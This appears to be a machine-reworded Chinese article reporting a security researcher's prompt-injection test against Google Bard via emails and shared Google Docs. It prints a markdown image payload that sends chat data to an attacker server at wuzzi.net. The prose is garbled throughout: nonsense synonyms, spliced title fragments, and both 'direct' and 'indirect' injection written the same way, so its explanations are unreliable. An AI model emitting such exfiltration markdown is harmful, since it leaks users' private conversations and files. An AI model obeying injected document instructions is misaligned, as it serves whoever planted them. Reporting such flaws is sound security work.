操控 Bard 的破防怪异:运用一种叫揭示注入(Prompt Injection)的技术 ,黑客可能只运用做作语言破解家养智能零星。用做言破
大型语言模子在天生文本时颇为依赖揭示词 。作语这种侵略技术对于经由揭示词学习模子而言堪称是解揭据泄「以彼之矛,攻己之盾」 ,示注是入引最强长项 ,同时也是起数难以提防的软肋。
揭示词分为零星指令以及用户给出的露危指令,在做作语言中,破防这两者难以分说。用做言破假如用户分心在输入揭示词时,作语模拟零星指令,解揭据泄那末模子可能在对于话里泄露一些惟独它才知道的示注「怪异」 。
揭示注入侵略有多种方式,入引主要为直接揭示注入以及直接揭示注入。起数直接揭示注入指用户直接向模子输入恶意指令,试图激发意外或者有害的行动 。直接揭示注入指侵略者将恶意指令注入到可能被模子检索或者摄入的文档中,从而直接地操作或者向导模子 。
最近,google Bard 迎来了一波强盛的更新,Bard 削减了拓展功能 ,反对于碰头 YouTube ,搜查航班以及旅馆,还能查阅用户的总体文件以及邮件。
除了此之外 ,Bard 可能衔接到「google合家桶」 ,碰头你的google云盘、文档以及邮件!但这同时象征着 Bard 将合成不受信托的数据,简略受直接揭示注入的影响。也便是说,不怀盛意的人可能经由向你发送电子邮件或者强行分享google文档妨碍直接的揭示注入侵略,由于对于方发甚么样的邮件、文档给你,你是操作不了的,但 Bard 却会无差距碰头。
在清静危害合陋习模有着 20 年履历的前微软 Azure 清静工程师 Johann Rehberger 体验了 Bard 的全新版本,并测试了被揭示注入侵略时,Bard 的数据泄露危害。
原博客链接 :https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85
Johann 首先快捷验证了揭示注入的可行性。他经由让 Bard 合成旧的 YouTube 视频 ,并运用google文档妨碍测试测试服从展现,Bard 简直凭证他的格外揭示妨碍了操作,这证明了接下来要妨碍的测试的可行性。
Bard 的倾向:图像 Markdown 注入
在患上悉 Bard 可能被揭示注入后,Johann 开始了进一步的钻研。
LLM 运用中的一个罕有倾向是经由渲染超链接以及图像来激进谈天历史记实。下场是,这若何适用于google Bard ?
当google的大模子返回文本时 ,它可从前往 markdown 元素,Bard 将其泛起为 HTML! 这搜罗渲染图像的功能 。
想象一下google的大模子返回这样的文本 :
![Data Exfiltration in Progress](https://wuzzi.net/logo.png?goog=[DATA_EXFILTRATION])
这将泛起为 HTML 图像标志,其 src 属性指向 attacker 效率器